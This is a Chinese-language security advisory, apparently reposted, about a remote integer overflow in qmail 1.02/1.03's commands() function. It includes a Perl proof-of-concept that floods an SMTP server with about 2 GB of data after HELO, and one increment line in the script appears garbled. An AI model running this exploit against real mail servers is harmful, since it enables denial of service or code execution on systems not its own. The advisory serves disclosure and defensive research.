QMail Commands()函数远程整数溢出漏洞

2008-04-09 04:24:27来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

QMail Commands()函数远程整数溢出漏洞

发布日期:2005-05-09
更新日期:2005-05-09

受影响系统:
Dan Bernstein QMail 1.03
Dan Bernstein QMail 1.02
描述:
BUGTRAQ ID: 13535

Qmail是新一代的UNIX邮件系统。

QMail的commands()函数存在远程整数溢出漏洞,远程攻击者可能利用此漏洞执行任意指令。

攻击者可以强制commands()函数覆盖整数值,导致用空字节覆盖非预期位置。仅在有多于4G虚拟内存的环境中(如64位系统)才可能执行这种攻击。

<*来源:Georgi Guninski (guninski@guninski.com)

链接:http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

------
qmlong-0-pub.pl

#!/usr/bin/perl -w

# written by georgi guninski.
# copyright georgi guninski
# cannot be used in vulnerability databases

use IO::Socket;

my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;

my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host,
PeerPort=>$port) || die("socket");


my $payload="v" x (1024*1024);
my $i=0;
print $sock "HELO";
while(42)
{
print $sock $payload;
$i ;
print "${i}\n";
if ($i == 2142) {last;}
}
print $sock " \r\n";

while(<$sock>) {print $_;}
------

建议:
厂商补丁:

Dan Bernstein
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://cr.yp.to/qmail.html

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:BEA WebLogic Server/Express管理控制台跨站脚本漏洞

下一篇:C